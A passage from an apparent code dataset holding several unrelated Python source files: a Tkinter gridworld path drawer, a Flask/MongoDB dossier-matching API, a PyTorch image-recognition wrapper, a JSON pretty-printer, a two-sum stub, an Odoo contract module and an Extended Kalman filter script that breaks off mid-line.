key in tuples:\n if key not in self.path_circles:\n self.path_circles[key] = self.canvas.create_oval(x * self.unit + self.unit/2 - self.unit / 10, y * self.unit + self.unit/2 - self.unit / 10, x * self.unit + self.unit/2 + self.unit / 10, y * self.unit + self.unit/2 + self.unit / 10, width=2)\n else:\n self.canvas.itemconfig(self.path_circles[key], fill='white')\n if key == tuples[len(tuples)-1]:\n self.canvas.itemconfig(self.path_circles[key], fill='orange')\n else:\n if key in self.path_circles:\n self.canvas.delete(self.path_circles.pop(key))\n\n line_keys = set()\n for idx, tuple in enumerate(tuples[:-1]):\n x, y = tuple\n x2, y2 = tuples[idx+1]\n line_coor = (x, y, x2, y2)\n if line_coor not in self.path_lines:\n self.path_lines[line_coor] = self.canvas.create_line(x * self.unit + self.unit / 2, y * self.unit + self.unit / 2, x2 * self.unit + self.unit / 2, y2 * self.unit + self.unit / 2)\n line_keys.add(line_coor)\n for line_key in list(self.path_lines.keys()):\n if line_key not in line_keys:\n self.canvas.delete(self.path_lines.pop(line_key))\n\n # time.sleep(.5)\n","repo_name":"BramVandendriessche/boarld","sub_path":"boarld/boarld/gridworld/visual/tk/VisualGridAgentTraining.py","file_name":"VisualGridAgentTraining.py","file_ext":"py","file_size_in_byte":2163,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"44151706008","text":"# -*- coding: utf-8 -*-\nfrom flask_restful import Resource, reqparse, abort, request\nfrom app.models import Source, Dossiers, Societys\nfrom bson.json_util import dumps, ObjectId, loads \n# from bson.json_util import loads as bason_loads\nfrom json import loads\nfrom app.auth import verify_token\nfrom datetime import datetime\nfrom pymongo import DESCENDING, ASCENDING\nimport time\nimport re\nimport jieba\nfrom app.utils import cal_weights\nfrom functools import reduce\n\nclass Dossier(Resource):\n def __init__(self, ):\n self.parser = reqparse.RequestParser()\n\n decorators = [verify_token]\n\n def get(self, returnToken=None, userId=None):\n self.parser.add_argument('org_name', type=str, help=\"请传入字符串类型\", default=\"\")\n self.parser.add_argument('unite_credict_code', type=str, help=\"请传入字符串类型\")\n self.parser.add_argument('law_men', type=str, help=\"请传入字符串类型\")\n self.parser.add_argument('region', type=str, action=\"append\", default=[])\n self.parser.add_argument('timerange', type=int, action=\"append\", default=[], help=\"请传入整数数组\")\n self.parser.add_argument('org_classify', type=str)\n self.parser.add_argument('sort', type=str)\n self.parser.add_argument('page', type=int, default=1)\n self.parser.add_argument('limit', type=int, default=10)\n self.parser.add_argument(\"dosser_id\", type=str)\n params = self.parser.parse_args()\n dosser_id = params.get(\"dosser_id\")\n if dosser_id:\n res = Dossiers.objects.get(_id=ObjectId(dosser_id)).to_json()\n for item in res.get(\"society_ids\", []):\n temp = item.pop(\"_id\")\n if temp.get(\"$oid\"):\n item[\"_id\"] = temp.get(\"$oid\")\n\n for item in res.get(\"source_ids\", []): \n temp = item.pop(\"_id\")\n if temp.get(\"$oid\"):\n item[\"_id\"] = temp.get(\"$oid\")\n\n return {\n \"data\": res,\n \"code\": 200,\n \"returnToken\": returnToken\n }\n page = params.pop(\"page\")\n limit = params.pop(\"limit\")\n where = {}\n for key, val in params.items():\n if key == 'region':\n if val:\n where.update({\"region\": {\"$all\": val} })\n else:\n if val:\n if key == \"timerange\": \n where.update({\"org_create_date\": {\"$gte\": val[0], \"$lte\": val[1]} })\n where.update({\n key: {\"$regex\": val}\n })\n\n Dossiers_collection = Dossiers._get_collection()\n total = Dossiers_collection.find(where).count()\n res = Dossiers_collection.aggregate([\n {\"$match\": where},\n {\n \"$unwind\": { \"path\" : \"$society_ids\", \"preserveNullAndEmptyArrays\":True}\n },\n {\n \"$unwind\": { \"path\" : \"$source_ids\", \"preserveNullAndEmptyArrays\":True}\n },\n {\n \"$lookup\": {\n \"from\": 'society',\n \"localField\": 'society_ids._id' ,\n \"foreignField\": '_id',\n \"as\": \"society_data\"\n }\n },\n {\n \"$lookup\": {\n \"from\": 'source',\n \"localField\": 'source_ids._id' ,\n \"foreignField\": '_id',\n \"as\": \"source_data\"\n }\n },\n {\n \"$group\": {\"_id\":\"$_id\", \"data\": {\"$mergeObjects\": \"$$ROOT\"} }\n },\n {\n \"$project\": {\n \"_id\": 0,\n }\n },\n {\n \"$sort\": {\n \"data.society_ids.f_score\": -1,\n \"data.source_ids.f_score\": -1,\n \"data.org_create_date\": -1,\n \"data.createAt\": -1,\n \"data.updateAt\": -1,\n },\n },\n {\n \"$skip\": (page-1)*limit\n },\n {\n \"$limit\": limit\n },\n ])\n res = loads(dumps(res))\n resData = {\n \"data\": res,\n \"total\": total\n }\n return {\n \"items\": resData,\n \"code\": 200,\n \"returnToken\": returnToken\n }\n\n def post(self, returnToken=None, userId=None):\n params = self.parser.parse_args()\n self.parser.add_argument('org_name', type=str, help=\"请传入字符串类型\", default=\"\")\n self.parser.add_argument('unite_credict_code', type=str, help=\"请传入字符串类型\")\n self.parser.add_argument('law_men', type=str, help=\"请传入字符串类型\")\n self.parser.add_argument('work_range', type=str, help=\"请传入字符串类型\")\n self.parser.add_argument('region', type=str, action=\"append\", default=[])\n # self.parser.add_argument('timerange', type=int, help=\"请传入整数类型\", action=\"append\", default=[])\n self.parser.add_argument('org_create_date', type=int)\n self.parser.add_argument('org_classify', type=str, help=\"请传入字符串类型\",)\n self.parser.add_argument('logo_url', type=str, help=\"请传入字符串类型\",)\n self.parser.add_argument('extra', type=str, help=\"请传入字符串类型\",)\n self.parser.add_argument(\"society_ids\", type=dict, action=\"append\", default=[])\n self.parser.add_argument(\"source_ids\", type=dict, action=\"append\", default=[])\n self.parser.add_argument(\"dosser_id\", type=str)\n params = self.parser.parse_args()\n source_ids = params.get(\"source_ids\")\n society_ids = params.get(\"society_ids\")\n try:\n for item in source_ids:\n item['_id'] = ObjectId(item.get('_id'))\n for item in society_ids:\n item['_id'] = ObjectId(item.get('_id'))\n dosser_id = params.pop(\"dosser_id\", None)\n if dosser_id:\n params.update({\n \"updateAt\": datetime.utcnow()\n })\n res = Dossiers.objects(_id= ObjectId(dosser_id) ).update_one(**params)\n return {\n \"code\": 200,\n \"returnToken\": returnToken\n }\n except Exception as e:\n abort(400, **{\"message\":{\"must\":\"不合法的参数\"}})\n \n data = Dossiers(**params)\n data.save()\n res_id = str( data['auto_id_0'] )\n \n return {\n \"res_id\": res_id,\n \"code\": 200,\n \"returnToken\": returnToken\n }\n\nclass DossierMatch(Resource):\n def __init__(self, ):\n self.parser = reqparse.RequestParser()\n self.parser.add_argument('org_name', type=str, help=\"请传入字符串类型\", default=\"\")\n self.parser.add_argument('unite_credict_code', type=str, help=\"请传入字符串类型\")\n self.parser.add_argument('law_men', type=str, help=\"请传入字符串类型\")\n self.parser.add_argument('work_range', type=str, help=\"请传入字符串类型\")\n self.parser.add_argument('region', type=str, action=\"append\", default=[])\n self.parser.add_argument('timerange', type=int, help=\"请传入整数类型\", action=\"append\", default=[])\n self.parser.add_argument('page', type=int, default=1)\n self.parser.add_argument('limit', type=int, default=10)\n \n decorators = [verify_token]\n def generateWeights(self, weights, filter_keys=['org_name', 'law_men', 'work_range', 'region', 'timerange'] ):\n params = self.parser.parse_args()\n front_keys = [ key for key, val in params.items() if val and key in filter_keys ] #前台展示比例\n weights_front = weights.copy()\n weights_front = list( weights_front.items() )\n def add(x, y):\n if type(x) == tuple:\n if x[0] in front_keys:\n x = x[1]\n else:\n x = 0\n\n if type(y) == tuple:\n if y[0] in front_keys:\n y = y[1]\n else:\n y = 0 \n \n return x+ y\n\n total_rate = reduce(add, weights_front)\n def filter_front(item):\n key, val = item\n if key in front_keys:\n if val >= 1:\n return item\n item = ( key, val * (1/total_rate) )\n return item\n else:\n return (key, 0)\n \n weights_front = dict( map(filter_front, weights_front ) )\n return weights_front\n\n def get(self, returnToken=None, userId=None): #匹配社会组织\n params = self.parser.parse_args()\n where = {}\n weights_obj = cal_weights()\n weights = weights_obj.get(\"weights\")\n weights_front = self.generateWeights(weights)\n org_name_len = 0\n for key, val in params.items():\n if not val:\n continue\n if key == 'region' :\n where.update({\"region\": {\"$all\": val} })\n elif key == 'timerange':\n if val:\n if len(val) == 2:\n where.update({\"org_create_date\": {\"$gte\":val[0], \"$lte\":val[1]} })\n elif len(val) == 1:\n where.update({\"org_create_date\": {\"$gte\":val[0]} })\n else:\n continue\n else:\n if key == \"unite_credict_code\":\n continue\n if key!= \"page\" and key!=\"limit\": \n val = val.strip()\n if val:\n if key == \"org_name\":\n org_name_len = len(val.replace(\" \",\"\"))\n temp = re.split('\\s+', val) #空格匹配\n where[\"$and\"] = []\n for temp_i in temp:\n where[\"$and\"].append({ \"org_name\": {\"$regex\": re.compile(\"{0}\".format(temp_i))} })\n continue\n parttern = re.compile(\"{0}\".format(val))\n where.update({\n key:{\"$regex\": parttern}\n })\n\n if params.get(\"unite_credict_code\"):\n where = {\n \"$or\": [\n {\n \"unite_credict_code\": params.get(\"unite_credict_code\")\n },\n where\n ]\n }\n # print(where)\n collection = Dossiers._get_collection()\n Societys_collection = Societys._get_collection() \n page = params.get(\"page\")\n limit = params.get(\"limit\")\n work_range_count = 0\n if where == {}:\n abort(400, **{\"message\":{\"must\":\"请至少提供一个参数\"}})\n res = Societys_collection.aggregate([\n {\"$match\": where},\n { \n \n \"$addFields\":{\n \"name_score\":{ \"$cond\": [ \"$org_name\", {\"$divide\":[ org_name_len, {\"$strLenCP\":\"$org_name\"}] }, 0 ]},\n \"law_men_score\": { \"$cond\": [ {\"$in\": [ { \"$indexOfCP\":[ \"$law_men\" , params.get(\"law_men\") ]}, [None, -1] ]} , 0, {\"$divide\":[ len(params.get(\"law_men\", \"\")), {\"$strLenCP\":\"$law_men\"}] } ]},\n \"region_score\": { \"$cond\": [{\"$in\": [ params.get(\"region\"), [ [], ['']] ]} , 0, 1 ]},\n \"timerange_score\": { \"$cond\": [ {\"$in\": [ params.get(\"timerange\"), [ [], ['']] ]}, 0, 1 ]},\n \"work_range_score\": { \"$cond\": { \"if\" : bool(params.get(\"work_range\")) , \"then\": 1, \"else\": 0 } },\n \"unite_credict_code_score\": { \"$cond\": [ {\"$eq\": [ params.get(\"unite_credict_code\",False), \"$unite_credict_code\" ] } , 1, 0 ] },\n \"society_id\": {\n \"$toString\":\"$_id\"\n },\n }\n },\n {\n \"$addFields\":{\n \"name_score_rate\": {\"$multiply\": [ \"$name_score\", weights.get(\"org_name\")] }, \n \"law_men_score_rate\": {\"$multiply\": [ \"$law_men_score\", weights.get(\"law_men\")] },\n \"region_score_rate\": {\"$multiply\": [ \"$region_score\", weights.get(\"region\")] }, \n \"work_range_score_rate\": {\"$multiply\": [ \"$work_range_score\", weights.get(\"work_range\")] },\n \"timerange_score_rate\": {\"$multiply\": [ \"$timerange_score\", weights.get(\"timerange\")] },\n \"unite_credict_code_score_rate\":\"$unite_credict_code_score\",\n \"f_name_score_rate\": {\"$multiply\": [ \"$name_score\", weights_front.get(\"org_name\")] }, \n \"f_law_men_score_rate\": {\"$multiply\": [ \"$law_men_score\", weights_front.get(\"law_men\")] },\n \"f_region_score_rate\": {\"$multiply\": [ \"$region_score\", weights_front.get(\"region\")] }, \n \"f_work_range_score_rate\": {\"$multiply\": [ \"$work_range_score\", weights_front.get(\"work_range\")] },\n \"f_timerange_score_rate\": {\"$multiply\": [ \"$timerange_score\", weights_front.get(\"timerange\")] },\n }\n },\n {\n \"$addFields\":{\n \"score\": { \"$sum\": [\n \"$name_score_rate\", \"$law_men_score_rate\", \"$region_score_rate\", \"$work_range_score_rate\", \"$timerange_score_rate\", \"$unite_credict_code_score_rate\"\n ]\n },\n \"f_score\": { \"$sum\": [\n \"$f_name_score_rate\", \"$f_law_men_score_rate\", \"$f_region_score_rate\", \"$f_work_range_score_rate\", \"$f_timerange_score_rate\", \"$unite_credict_code_score_rate\"\n ]\n }\n }\n },\n {\n \"$facet\":{\n \"total\":[\n {\"$count\": \"total\" }\n ],\n \"data\": [\n {\n \"$project\":{\n \"_id\": 0,\n }\n },\n {\n \"$sort\": {\n \"score\": -1\n }\n },\n {\n \"$skip\": (page-1)*limit\n },\n {\n \"$limit\": limit\n },\n \n ]\n },\n },\n {\n \"$project\":{\n \"total\": { \n \"$arrayElemAt\": [ \"$total.total\", 0 ] \n },\n \"data\": 1\n }\n },\n\n ])\n society_data = loads(dumps(res))\n society_data = society_data[0] if len(society_data)>0 else {}\n return {\n \"items\": society_data,\n \"code\": 200,\n \"returnToken\": returnToken\n }\n def post(self, returnToken=None, userId=None): #匹配微信\n params = self.parser.parse_args()\n where = {}\n weights_obj = cal_weights()\n weights = weights_obj.get(\"weights\", ['org_name', 'work_range', 'timerange'] )\n weights_front = self.generateWeights(weights, filter_keys=['org_name'])\n org_name_len = 0\n for key, val in params.items():\n if not val:\n continue\n\n if key == 'timerange':\n if val:\n if len(val) == 2:\n where.update({\n \"info.company_create_date\":{\"$gte\": val[0], \"$lte\":val[1] },\n })\n elif len(val) == 1:\n where.update({\n \"info.company_create_date\":{\"$gte\": val[0] },\n })\n else:\n continue\n else:\n if key == \"unite_credict_code\":\n continue\n if key!= \"page\" and key!=\"limit\": \n val = val.strip()\n if val:\n if key == \"org_name\":\n org_name_len = len(val.replace(\" \",\"\"))\n temp = re.split('\\s+', val) #空格匹配\n where[\"$and\"] = []\n for temp_i in temp:\n # print(temp_i)\n where[\"$and\"].append({ \"NickName\": {\"$regex\": re.compile(\"{0}\".format(temp_i)) } })\n continue\n if key == \"work_range\":\n val = \"|\".join(jieba.lcut(val))\n where.update({\n \"$or\": []\n })\n where[\"$or\"] = where[\"$or\"] + [ { \"info.work_range_common\": re.compile( \"{0}\".format(val) ) }, { \"info.work_range_front_premit\": re.compile(\"{0}\".format(val) ) }]\n\n if params.get(\"unite_credict_code\"):\n where= {\n \"$or\": [\n {\n \"gs_credict_code\": params.get(\"unite_credict_code\")\n },\n {\n \"zz_credict_code\": params.get(\"unite_credict_code\")\n },\n where\n ]\n }\n if where == {}:\n abort(400, **{\"message\":{\"must\":\"请至少提供一个参数\"}})\n\n page = params.get(\"page\")\n limit = params.get(\"limit\")\n source_collecion = Source._get_collection()\n res = source_collecion.aggregate([\n {\"$match\": where},\n {\n \"$facet\":{\n \"total\":[\n {\"$count\": \"total\" }\n ],\n \"data\": [\n {\n \"$project\":{\n \"_id\": 1,\n \"NickName\": 1,\n \"info\": {\"$ifNull\": [\"$info\", {}]},\n \"__biz\": 1,\n \"name_score_one\": 1,\n \"name_score_one\":{ \"$cond\":[\n { \"$and\": [\"$NickName\", bool(params.get(\"org_name\")) ] },\n {\"$divide\":[ org_name_len, {\"$strLenCP\": \"$NickName\" } ] },\n None,\n ]\n },\n \"name_score_two\":{ \"$cond\":[\n { \"$and\": [\"$info.full_name\", bool(params.get(\"org_name\")) ] },\n {\"$divide\":[ org_name_len, {\"$strLenCP\": \"$info.full_name\" } ] },\n None,\n ]\n },\n \"work_range_score\": { \"$cond\": { \"if\" : bool(params.get(\"work_range\")) , \"then\": 1, \"else\": 0 } },\n \"timerange_score\": { \"$cond\": { \"if\" : bool(params.get(\"timerange\")) , \"then\": 1, \"else\": 0 } },\n \"unite_credict_code_score\": { \"$cond\": { \"if\" : bool(params.get(\"unite_credict_code\")) , \"then\": 1, \"else\": 0 } },\n }\n },\n {\n \"$addFields\": {\n \"name_score\": {\n \"$let\":{\n \"vars\": {\n \"name_score\": \"$name_score_one\" or \"$name_score_two\" or 0\n },\n \"in\": \"$$name_score\"\n }\n \n },\n \"source_id\": {\n \"$toString\":\"$_id\"\n },\n }\n },\n {\n \"$addFields\": {\n \"name_score_rate\": {\"$multiply\": [ \"$name_score\", weights.get(\"org_name\")] }, \n \"work_range_score_rate\":{\"$multiply\": [ \"$work_range_score\", weights.get(\"work_range\")] },\n \"timerange_score_rate\":{\"$multiply\": [ \"$timerange_score\", weights.get(\"timerange\")] },\n \"unite_credict_code_score_rate\":\"$unite_credict_code_score\",\n \"f_name_score_rate\": {\"$multiply\": [ \"$name_score\", weights_front.get(\"org_name\")] }, \n \"f_work_range_score_rate\":{\"$multiply\": [ \"$work_range_score\", weights_front.get(\"work_range\")] },\n \"f_timerange_score_rate\":{\"$multiply\": [ \"$timerange_score\", weights_front.get(\"timerange\")] },\n }\n },\n {\n \"$addFields\": {\n \"score\": { \"$sum\": [\"$name_score_rate\", \"$work_range_score_rate\",\"timerange_score_rate\", \"$unite_credict_code_score_rate\"]},\n \"f_score\": { \"$sum\": [\"$f_name_score_rate\",\"f_timerange_score_rate\", \"$f_work_range_score_rate\", \"$unite_credict_code_score_rate\"]}\n }\n },\n {\n \"$sort\": {\n \"score\": -1\n }\n },\n {\n \"$skip\": (page-1)*limit\n },\n {\n \"$limit\": limit\n },\n \n ]\n },\n },\n {\n \"$project\":{\n \"total\": { \n \"$arrayElemAt\": [ \"$total.total\", 0 ] \n },\n \"data\": 1\n }\n },\n\n ])\n source_data = loads(dumps(res))\n source_data = source_data[0] if len(source_data)>0 else {}\n return {\n \"items\": source_data,\n \"code\": 200,\n \"returnToken\": returnToken\n }\n # res = cal_weights()\n # weights = res[\"weights\"]\n # weights[\"社会组织名称\"] = weights.pop(\"org_name\")\n # weights[\"统一社会信用代码\"] = 1\n # weights[\"法定代表人姓名\"] = weights.pop(\"law_men\")\n # weights[\"行政区划\"] = weights.pop(\"region\")\n # weights[\"业务范围\"] = weights.pop(\"work_range\")\n # weights[\"成立登记日期\"] = weights.pop(\"timerange\")\n # return {\n # \"data\": res,\n # \"code\": 200,\n # \"returnToken\": returnToken\n # }\n","repo_name":"foggsz/luck","sub_path":"flask_back/app/api/dossiers.py","file_name":"dossiers.py","file_ext":"py","file_size_in_byte":23372,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"60"} +{"seq_id":"40127137734","text":"import torch.nn as nn\nimport torch.optim as optim\nimport torch.utils.data\nimport torch.backends.cudnn as cudnn\nimport torchvision\nfrom torchvision import transforms as transforms\nimport numpy as np\nimport visdom\nimport torch.nn.functional as F\nimport PIL.Image as Image\n\n\nimport argparse\nimport os\n\nfrom models.RMA_module_with_priori import RMA_module\nfrom models.loss_with_priori import loss_function\nfrom utils import get_target_transform as target_trans\nfrom utils import id2label\n\n\n# GPU setting\nos.environ.setdefault(\"CUDA_VISIBLE_DEVICES\", \"6\")\n\n\n# ==================================================================\n# Constants\n# ==================================================================\nEPOCH = 45 # number of times for each run-through\nBATCH_SIZE = 8 # number of images for each epoch\nN = 512 # size of input images (512 or 640)\nTOPK = 3 # top k highest-ranked labels \nGPU_IN_USE = torch.cuda.is_available() # whether using GPU\nPATH_MODEL_PARAMS = './params/params_with_priori.pkl'\n\n\n# ==================================================================\n# Parser Initialization\n# ==================================================================\nparser = argparse.ArgumentParser(description='Pytorch Implementation of ICCV2017_AttentionImageClass')\nparser.add_argument('--testBatchSize', default=BATCH_SIZE, type=int, help='testing batch size')\nparser.add_argument('--pathModelParams', default=PATH_MODEL_PARAMS, type=str, help='path of model parameters')\nparser.add_argument('--loadModel', default=True, type=bool, help='load model parameters')\nargs = parser.parse_args()\n\n\n# ==================================================================\n# Transforms for the Input Images\n# ==================================================================\nnormalize = transforms.Normalize(mean=[0.485, 0.456, 0.406],\n std=[0.229, 0.224, 0.225])\ntransforms = transforms.Compose([\n transforms.Resize((N, N)), \n transforms.ToTensor(),\n normalize\n ]) \n \n\nclass RMA_model(object):\n # 构造函数里加载模型,比如 tensorflow 的 graph, sess 等\n def __init__(self):\n # prepare model\n print('\\n***** Prepare Model *****')\n vgg16 = torchvision.models.vgg16(pretrained=True)\n self.extract_features = vgg16.features\n self.RMA = RMA_module(lstm_input_size=14, lstm_hidden_size=4096, zk_size=4096)\n if args.loadModel:\n self.RMA.load_state_dict(torch.load(args.pathModelParams))\n if GPU_IN_USE:\n print('CUDA_VISIBLE_DEVICES:', os.environ['CUDA_VISIBLE_DEVICES'])\n print('cuda: move all model parameters and buffers to the GPU')\n self.extract_features.cuda()\n self.RMA.cuda()\n cudnn.benchmark = True\n print('Model Preparation : Finished')\n\n # Test\n def evaluate(self, data):\n print('evaluate:')\n self.RMA.eval() # set the module in evaluation mode\n print('before transforms')\n data = transforms(data).unsqueeze(0)\n if GPU_IN_USE:\n data = data.cuda() # set up GPU Tensor\n \n print('before extracting features')\n f_I = self.extract_features(data) \n output, _ = self.RMA(f_I)\n print('after RMA') \n prediction = torch.topk(F.softmax(output, dim=1), 10, dim=1) \n filter = prediction[0].eq(0.1) + prediction[0].gt(0.1)\n category_id = torch.mul(prediction[1]+1, filter.type(torch.cuda.LongTensor))\n print(prediction[0])\n #print(category_id)\n return id2label(category_id)[0].tolist()\n\n\n # 需要对外提供一个 API,可以直接拿到你们的结果\n def image_recognition(self, image_path):\n # 业务逻辑\n print('image path: ', image_path)\n image = Image.open(image_path)\n if not image.mode == 'RGB':\n image = image.convert('RGB')\n with torch.no_grad():\n label = self.evaluate(image)\n print(label)\n return dict(\n data = label\n )\n \n def __del__(self):\n print(\"delete!\")\n\n# 生成模型实例\n# 这里生成模型实例供 server 导入并调用\nprint(\"生成 RMA Model 实例.................\")\nRMA_model_instance = RMA_model()\nprint(\"RMA Model 实例生成完成...............\")\n","repo_name":"James-Yip/AttentionImageClass","sub_path":"RMA_recognition.py","file_name":"RMA_recognition.py","file_ext":"py","file_size_in_byte":4473,"program_lang":"python","lang":"en","doc_type":"code","stars":87,"dataset":"github-code","pt":"60"} +{"seq_id":"40349458091","text":"#!/usr/bin/env python\nimport json\nimport sys\n\nif len(sys.argv) > 1:\n data = json.loads(open(sys.argv[1]).read())\nelse:\n data = json.loads(sys.stdin.read())\n\nprint(json.dumps(data, sort_keys=True, indent=4))\n","repo_name":"geekychandraul/Python","sub_path":"pretty-json.py","file_name":"pretty-json.py","file_ext":"py","file_size_in_byte":213,"program_lang":"python","lang":"el","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"150964275","text":"class Solution(object):\n def twoSum(self, nums, target):\n \"\"\"\n :type nums: List[int]\n :type target: int\n :rtype: List[int]\n \"\"\"\n i = 0\n j = 1\n while (i < len(nums)):\n while (j < len(nums)):\n print(nums[i])\n print(nums[j])\n j += 1\n i += 1\n\n\n","repo_name":"HeyAnirudh/leetcode","sub_path":"Two Sum.py","file_name":"Two Sum.py","file_ext":"py","file_size_in_byte":366,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"71015653952","text":"from odoo import models, fields, api\nimport logging\n\n_logger = logging.getLogger(__name__)\n\nclass Contract(models.Model):\n _inherit = 'hr.contract'\n\n analytic_account_id = fields.Many2one('account.analytic.account', string=\"Analytic Account\", copy=False, ondelete='set null',\n domain=\"['|', ('company_id', '=', False), ('company_id', '=', company_id)]\", check_company=True,\n help=\"Analytic account to which this project is linked for financial management. \"\n \"Use an analytic account to record cost and revenue on your project.\")\n \n timesheet_cycle = fields.Selection([\n ('monthly','Monthly'),\n ('weekly','Weekly'),\n ], string='Timesheet Cycle', default='monthly')\n \n timesheet_mode = fields.Selection([\n ('daily','Daily'),\n ('hourly','Hourly'),\n ], string='Timesheet Mode', default='daily')\n\n customer = fields.Many2one(related=\"cost_card.job_pos.customer\")\n timesheet_approver_1 = fields.Many2one('res.partner', string='Timesheet Approver 1', tracking=True, domain=\"['&', '|', ('company_id', '=', False), ('company_id', '=', company_id), ('type', '=', 'contact'), ('parent_id', '=', customer)]\")\n timesheet_approver_2 = fields.Many2one('res.partner', string='Timesheet Approver 2', tracking=True, domain=\"['&', '|', ('company_id', '=', False), ('company_id', '=', company_id), ('type', '=', 'contact'), ('parent_id', '=', customer)]\")\n \n @api.model\n def create(self, values):\n \"\"\" Create an analytic account for contract\n Note: create it before calling super() to avoid raising the ValidationError from _check_allow_timesheet\n \"\"\"\n if not values.get('analytic_account_id'):\n analytic_account = self._create_analytic_account_from_values(values)\n values['analytic_account_id'] = analytic_account.id\n response = super(Contract, self).create(values)\n return response\n\n def write(self, values):\n \"\"\" Create an analytic account for contract\n Note: create it before calling super() to avoid raising the ValidationError from _check_allow_timesheet\n \"\"\"\n response = super(Contract, self).write(values)\n if not self.analytic_account_id and not values.get('analytic_account_id'):\n self._create_analytic_account()\n return response\n\n def _create_analytic_account_from_values(self, values):\n analytic_account = self.env['account.analytic.account'].create({\n 'name': values.get('name', 'Unknown Analytic Account'),\n 'company_id': values.get('company_id') or self.env.company.id,\n 'partner_id': values.get('partner_id'),\n 'active': True,\n })\n return analytic_account\n\n def _create_analytic_account(self):\n for contract in self:\n analytic_account = self.env['account.analytic.account'].create({\n 'name': contract.name,\n 'company_id': contract.company_id.id,\n 'partner_id': contract.customer.id,\n 'active': True,\n })\n contract.write({'analytic_account_id': analytic_account.id})","repo_name":"dionisiotorres/nomina_v13","sub_path":"edari_timesheet/models/hr_contract.py","file_name":"hr_contract.py","file_ext":"py","file_size_in_byte":3165,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"7265777557","text":"import numpy as np\r\nimport pandas as pd\r\nfrom filterpy.kalman import ExtendedKalmanFilter\r\nimport matplotlib.pyplot as plt\r\n\r\n\r\n# File path of the dataset\r\nfile_path = r\"C:\\Users\\SHAIK VAZEER AHAMED\\Downloads\\Land vehicle\\Stationary_MRU_2021.xlsx\"\r\n\r\n\r\n# Load dataset\r\ndata = pd.read_excel(file_path)\r\n\r\n\r\n# Convert non-numeric values to NaN\r\nnumeric_columns = ['Magn_Z', 'Magn_Y', 'Magn_X', 'Acc_Z', 'Acc_Y', 'Acc_X', 'Gyro_Z', 'Gyro_Y', 'Gyro_X', 'Heading', 'Pitch', 'Roll', 'P_Bar', 'Altitude', 'Long', 'Lat']\r\ndata[numeric_columns] = data[numeric_columns].apply(pd.to_numeric, errors='coerce')\r\n\r\n\r\n# Extract relevant columns for tracking\r\ncolumns = ['Acc_X', 'Acc_Y', 'Acc_Z', 'Long', 'Lat', 'Gyro_X', 'Gyro_Y', 'Gyro_Z']\r\n\r\n\r\n# Filter out rows with insufficient data for tracking\r\ndata = data.dropna(subset=columns)\r\n\r\n\r\n# Create Extended Kalman filter\r\nnum_states = 8 # Number of states to track (Acc_X, Acc_Y, Acc_Z, Long, Lat, Gyro_X, Gyro_Y, Gyro_Z)\r\ndim_z = 8 # Number of measurements (Acc_X, Acc_Y, Acc_Z, Long, Lat, Gyro_X, Gyro_Y, Gyro_Z)\r\n\r\nekf = ExtendedKalmanFilter(dim_x=num_states, dim_z=dim_z)\r\n\r\n\r\n# Initialize Extended Kalman filter\r\ninitial_state = data.iloc[0][columns].values.astype(np.float64)\r\ninitial_covariance = np.eye(num_states) * 0.1\r\n\r\nekf.x = initial_state\r\nekf.P = initial_covariance\r\n\r\n\r\n# Define state transition matrix and control input matrix\r\ndt = 1.0\r\nekf.F = np.eye(num_states)\r\nekf.B = np.eye(num_states)\r\n\r\n\r\n# Define measurement function\r\ndef h(x):\r\n # Modify this function based on the measurements available in your system\r\n return x\r\n\r\n\r\n# Define the Jacobian matrix of the measurement function\r\ndef H(x):\r\n # Modify this function based on the Jacobian of your system\r\n return np.eye(dim_z, num_states)\r\n\r\n\r\nekf.h = h\r\nekf.H = H\r\n\r\n\r\n# Define process noise covariance and measurement noise covariance\r\nekf.Q = np.eye(num_states) * 0.01\r\nekf.R = np.eye(dim_z) * 0.1 # Adjust the value to control the filtering of measurement noise\r\n\r\n\r\n# Extract original data for plotting\r\noriginal_acc = data[['Acc_X', 'Acc_Y', 'Acc_Z']].values\r\noriginal_gyro = data[['Gyro_X', 'Gyro_Y', 'Gyro_Z']].values\r\noriginal_lat = data['Lat'].values\r\noriginal_long = data['Long'].values\r\n\r\n# Define the Jacobian matrix of the measurement function\r\ndef HJacobian(x):\r\n # Modify this function based on the Jacobian of your system\r\n return np.eye(dim_z, num_states)\r\n\r\n\r\n# Define the predicted measurement function\r\ndef Hx(x):\r\n # Modify this function based on the predicted measurement equations of your system\r\n return x\r\n\r\n\r\n# Set the HJacobian and Hx functions in the ExtendedKalmanFilter object\r\nekf.HJacobian = HJacobian\r\nekf.Hx = Hx\r\n\r\n# Track the object using the Extended Kalman filter\r\nfiltered_states = []\r\nfor _, row in data.iterrows():\r\n measurement = row[columns].values.astype(np.float64)\r\n ekf.predict()\r\n ekf.update(measurement,HJacobian,Hx)\r\n filtered_states.append(ekf.x.copy())\r\n\r\n\r\n# Convert filtered states to numpy array\r\nfiltered_states = np.array(filtered_states)\r\n\r\n\r\n# Extract filtered data for plotting\r\nfiltered_acc = filtered_states[:, :3]\r\nfiltered_gyro = filtered_states[:, 5:8]\r\nfiltered_lat = filtered_states[:,0]\r\nfiltered_long = filtered_states[:,0]\r\n\r\n\r\n# Plot the original and filtered trajectories\r\nplt.figure(figsize=(18, 12))\r\n\r\n# Plot original acceleration\r\nplt.subplot(2, 4, 1)\r\nplt.plot(original_acc[:, 0], label='Original Acc_X')\r\nplt.plot(original_acc[:, 1], label='Original Acc_Y')\r\nplt.plot(original_acc[:, 2], label='Original Acc_Z')\r\nplt.xlabel('Index')\r\nplt.ylabel('Acceleration')\r\nplt.title('Original Acceleration')\r\nplt.legend(loc='upper right')\r\n\r\n\r\n# Plot original gyroscope\r\nplt.subplot(2, 4, 2)\r\nplt.plot(original_gyro[:, 0], label='Original Gyro_X')\r\nplt.plot(original_gyro[:, 1], label='Original Gyro_Y')\r\nplt.plot(original_gyro[:, 2], label='Original Gyro_Z')\r\nplt.xlabel('Index')\r\nplt.ylabel('Angular Velocity')\r\nplt.title('Original Gyro')\r\nplt.legend(loc='upper right')\r\n\r\n\r\n# Plot original latitude\r\nplt.subplot(2, 4, 3)\r\nplt.plot(original_lat, label='Original 